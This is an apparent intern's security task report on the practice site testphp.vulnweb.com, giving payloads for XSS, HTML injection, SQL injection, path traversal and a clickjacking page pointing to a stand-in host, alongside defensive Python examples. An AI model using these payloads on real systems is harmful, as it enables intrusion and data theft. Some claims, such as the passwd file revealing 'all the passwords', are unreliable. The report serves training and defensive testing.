ShadowFox Tasks (HARD)

The document is a task report by a Cyber Security intern, Manav, detailing various vulnerabilities found on the website http://testphp.vulnweb.com/. It covers six types of vulnerabilities: HTML Injection, Reflected XSS, Stored XSS, File Path Traversal, SQL Injection, and Clickjacking + Open Redirect, along with descriptions, reproduction steps, and mitigations for each. The report emphasizes the importance of input sanitization and implementing security headers to prevent these vulnerabilities.


CYBER SECURITY INTERN

Task Report

Name : Manav
Domain: Cyber Security
Company: Shadowfox
Level: Hard
Batch: May, 2024
Contents of Hard level:

3 - Vulnerabilities in http://testphp.vulnweb.com/

a - HTML Injection
b - Reflected XSS
c - Stored XSS
d - File Path Traversal
e - SQL Injection
f - Clickjacking + Open Redirect

• Description
• Steps to Reproduce
• Mitigations
• Proof of Concept (Screenshots)

--------------------------------------------------------------------------------
A – HTML Injection

Description:
HTML Injection is a security vulnerability that allows an attacker to
inject arbitrary HTML markup into a web page, because user input is
written into the response without being encoded.

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> In the search bar, type this payload: <h1>Hacked By Manav</h1>
-> It will be reflected like this:
-> You can also enter this payload if you want this type of result:
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION POC DONE BY MANAV</marquee>
</body>
</html>

Mitigations :
- Input sanitization
- Block special characters like <> / ()
- Implement CSP Header
-------------------------------------------------------------------------------------

B – Reflected XSS
Description:
Reflected XSS is a type of attack in which an attacker injects malicious
script into a request to the website, and the web application reflects
it back to the user in its response, where the browser executes it.

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> In the search bar, enter this payload:
<script>prompt(document.domain)</script>
-> The payload will then be reflected back to you

-> We can also try other payloads like:

<img src=x onerror=prompt(1)>
<img src=any image link>

-> If we give any image link in this payload, the image will get
reflected like this

Mitigations :

- Input sanitization
- Block special characters like <> / ()
- Implement CSP Header

C – Stored XSS
Description:
Stored XSS is a type of attack in which an attacker injects malicious
script and payloads into the website; the input is stored in the database
and executed whenever users access that...

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> Navigate to the signup page and enter the default credentials
-> You will be logged in
-> Enter this payload in the Name and Email fields and update them:
<script>alert(1)</script>
-> It will be stored in the database, and after that you will get a popup
(as you can see in the screenshot)


Mitigations :

- Implement CSP header
- Regular security testing
- Employ automated scanning tools as well as perform manual testing
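Sections A, B and C share one root cause (user input written into the page unencoded) and one core fix (entity-encode at output time, backed by a CSP). The following is an added example, not code from the report or from the vulnweb site; the render functions, the SECURITY_HEADERS values and the tags_in helper are assumptions for illustration.

```python
import html
import re

# The exact strings used in the report's reproduction steps (sections A, B, C).
REPORT_PAYLOADS = [
    "<h1>Hacked By Manav</h1>",
    "<script>prompt(document.domain)</script>",
    "<img src=x onerror=prompt(1)>",
    "<script>alert(1)</script>",
]

# Assumed hardened response headers; the CSP is restrictive on purpose
# (no inline scripts), which is what keeps an injected <script> inert.
SECURITY_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    "X-Content-Type-Options": "nosniff",
}

_TAG_RE = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)")


def tags_in(markup: str) -> set:
    """Names of every element a browser would see in the markup."""
    return {m.group(1).lower() for m in _TAG_RE.finditer(markup)}


def render_search_vulnerable(term: str) -> str:
    """Mirror of the flaw behind sections A and B: the search term is pasted
    straight into the page, so any tags it carries become live elements."""
    return f"<p>Results for: {term}</p>"


def render_search_hardened(term: str) -> str:
    """Same page, but the term is entity-encoded at output time; quote=True
    also encodes quotes so the value is safe inside attributes."""
    return f"<p>Results for: {html.escape(term, quote=True)}</p>"


def render_profile_hardened(name: str, email: str) -> str:
    """Section C: stored values get the same treatment when rendered.
    Encoding only on the way in is not enough once data is reused elsewhere."""
    return (
        "<dl><dt>Name</dt><dd>{}</dd><dt>Email</dt><dd>{}</dd></dl>"
        .format(html.escape(name, quote=True), html.escape(email, quote=True))
    )
```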

-------------------------------------------------------------------------------------

D – File Path Traversal

Description:
File Path Traversal, also known as Directory Traversal, allows an
attacker to access files on your web server or application to which
they should not have access.

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> Navigate to Browse Categories > Posters
-> You will get a lot of images | Open the first image in a new tab
-> Intercept that request in Burp Suite and send it to Repeater
-> Remove the ./pictures/1.jpg and in its place enter this
payload: ../../etc/passwd
-> You will get to see all the passwords
Mitigations :

- Validate the user input before processing it
- Files with sensitive information should be hidden
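"Validate the user input" for a file parameter means normalising the path and checking it still lies inside the folder you intend to serve. This is an added example, not the site's code; WEB_ROOT and the pictures folder are assumed, modelled only on the ./pictures/1.jpg request shown above.

```python
from pathlib import Path

# Assumed document root; the real layout of testphp.vulnweb.com is not known
# here, only that images are requested as ./pictures/1.jpg.
WEB_ROOT = Path("/srv/webroot")


def resolve_picture(requested: str, root: Path = WEB_ROOT) -> Path:
    """Map a client-supplied picture path onto a file under root/pictures.

    Raises ValueError whenever the normalised path leaves that folder, which
    is exactly what the ../../etc/passwd payload from the report tries to do.
    """
    if "\x00" in requested:
        raise ValueError("NUL byte in path")
    allowed = (root / "pictures").resolve()
    # Join under the root, then collapse every '.' and '..' segment BEFORE
    # comparing; a leading '/' is stripped so absolute paths cannot escape.
    candidate = (root / requested.lstrip("/")).resolve()
    if allowed not in candidate.parents:
        raise ValueError(f"path escapes pictures folder: {requested!r}")
    return candidate


def is_safe_picture(requested: str, root: Path = WEB_ROOT) -> bool:
    """Boolean wrapper around the same check (handy for logging and tests)."""
    try:
        resolve_picture(requested, root)
        return True
    except ValueError:
        return False
```

Comparing against the resolved allowed folder (rather than looking for the substring "..") also catches encoded and mixed forms such as pictures/../../etc/passwd.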

-------------------------------------------------------------------------------------

E – SQL Injection
Description:
SQL Injection is a type of attack that targets the security of the
database behind a website or a mobile application.
Its main purpose is to replace the original parameters with malicious SQL
code, which results in exposing their design and implementation flaws...

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/
-> Navigate to Browse Categories > Stickers
-> You will get this URL:
http://testphp.vulnweb.com/listproducts.php?cat=3
-> Simply after the 3, enter this payload:
union select 1,2,3,4,5,6,7,8,9,10,@@version
-> Hit enter and you will get to see the version
Mitigations :

- Secure all fields from invalid inputs
- Deploy firewalls
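The injection works because the cat parameter is pasted into the SQL text; "securing the field" means validating it and binding it as a parameter so it can only ever be a value. Added example (not the site's code): the products table, make_catalogue and the function names are constructed stand-ins, not the real vulnweb schema, and SQLite is used in place of the site's database.

```python
import sqlite3

# Constructed stand-in for the catalogue behind listproducts.php?cat=... ;
# not the real vulnweb schema, just enough rows to show the difference.
def make_catalogue() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 3, 'Sticker A'), (2, 3, 'Sticker B'),
                                    (3, 1, 'Poster A');
    """)
    return con

# The value the report appends to cat=3 in the URL.
INJECTED = "3 union select 1,2,3,4,5,6,7,8,9,10,@@version"


def vulnerable_statement(cat: str) -> str:
    """How the flawed page builds its query: the raw parameter is pasted into
    the SQL text, so 'union select ...' becomes part of the statement.
    Returned as a string here, deliberately not executed."""
    return f"SELECT id, cat, name FROM products WHERE cat = {cat}"


def cat_is_valid(cat: str) -> bool:
    """Allow-list the parameter before it gets anywhere near the database."""
    return cat.isdigit()


def list_products(con: sqlite3.Connection, cat: str) -> list:
    """Hardened version: validate, then bind the value with a placeholder."""
    if not cat_is_valid(cat):
        raise ValueError(f"cat must be a positive integer, got {cat!r}")
    sql = "SELECT id, cat, name FROM products WHERE cat = ?"
    return con.execute(sql, (int(cat),)).fetchall()


def list_products_bound_only(con: sqlite3.Connection, cat: str) -> list:
    """Even with no validation, a bound parameter is data, never SQL: the whole
    injected string is compared against the cat column and matches no row."""
    sql = "SELECT id, cat, name FROM products WHERE cat = ?"
    return con.execute(sql, (cat,)).fetchall()
```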

-------------------------------------------------------------------------------------
F – Clickjacking + Open Redirect

Description:
Clickjacking - A malicious technique in which an attacker tricks a user
into clicking on something that can cause a malware download or a
redirect to some malicious website (which is what I have done in this
report)...

Open Redirect - An open redirect is a vulnerability found in web
applications where an attacker can redirect users to a malicious
website of their choice.

Steps to Reproduce :
-> Visit http://testphp.vulnweb.com/ | copy the URL
-> Navigate to https://clickjacker.io/ | paste the website URL to test
-> You will see that this website is vulnerable to a clickjacking
attack (but now let's see how we can chain it with an open redirect)
-> Save this HTML file and open it in any browser:
<!DOCTYPE html>
<html>
<head>
<style>
iframe {
  width: 100%;
  height: 585px;
  border: none;
}
</style>
<title>ClickJacking PoC</title>
</head>
<body>
<a onmouseover='window.open("https://evil.com")' href="https://evil.com" style="z-index:1;left:900px;position:relative;top:150px;font-family: Montserrat;font-weight: 800;font-size: 16px;text-transform: uppercase;color:red;text-decoration:none;font-style: normal;">
click here to win the prize </a>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts"
style="opacity:1"
src="http://testphp.vulnweb.com/"></iframe>
</body>
</html>
-> When you open this file you will see the website in a frame with
CLICK HERE TO WIN THE PRIZE written over it
-> So when you click on "Click here to win the prize"
-> You will be redirected to evil.com
Mitigations :

- Implement CSP header
- Set the X-Frame-Options header to prevent the webpage from being
loaded in a frame
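The PoC above only works because the site sends neither of these headers. The check below is an added example (not from the report or from clickjacker.io): it decides from a response's headers whether a third-party page could still frame it, and it applies the rule browsers use, that a CSP frame-ancestors directive takes precedence over X-Frame-Options and that default-src does not cover framing. RECOMMENDED_HEADERS and the function names are assumptions.

```python
# Assumed headers a hardened deployment would send; the report recommends
# X-Frame-Options and CSP, and frame-ancestors is the CSP directive for it.
RECOMMENDED_HEADERS = {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
}

# Sources that let any origin embed the page.
_WILDCARD_SOURCES = {"*", "http:", "https:"}


def frame_ancestors(csp: str):
    """Return the source list of the frame-ancestors directive, or None if the
    policy has no such directive (default-src does NOT apply to framing)."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            return [p.lower() for p in parts[1:]]
    return None


def cross_site_framing_allowed(headers: dict) -> bool:
    """True when any third-party page could load this response in an <iframe>,
    which is the condition the clickjacking PoC in the report depends on."""
    h = {k.lower(): v for k, v in headers.items()}
    sources = frame_ancestors(h.get("content-security-policy", ""))
    if sources is not None:
        # Browsers that understand frame-ancestors ignore X-Frame-Options;
        # 'none', 'self' or a named host all block arbitrary third parties.
        return any(s in _WILDCARD_SOURCES for s in sources)
    xfo = h.get("x-frame-options", "").strip().upper()
    return xfo not in ("DENY", "SAMEORIGIN")
```

Feed it the headers captured in Burp Suite for the target response; an empty result from frame_ancestors together with no X-Frame-Options is the finding reported above.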

-------------------------------------------------------------------------------------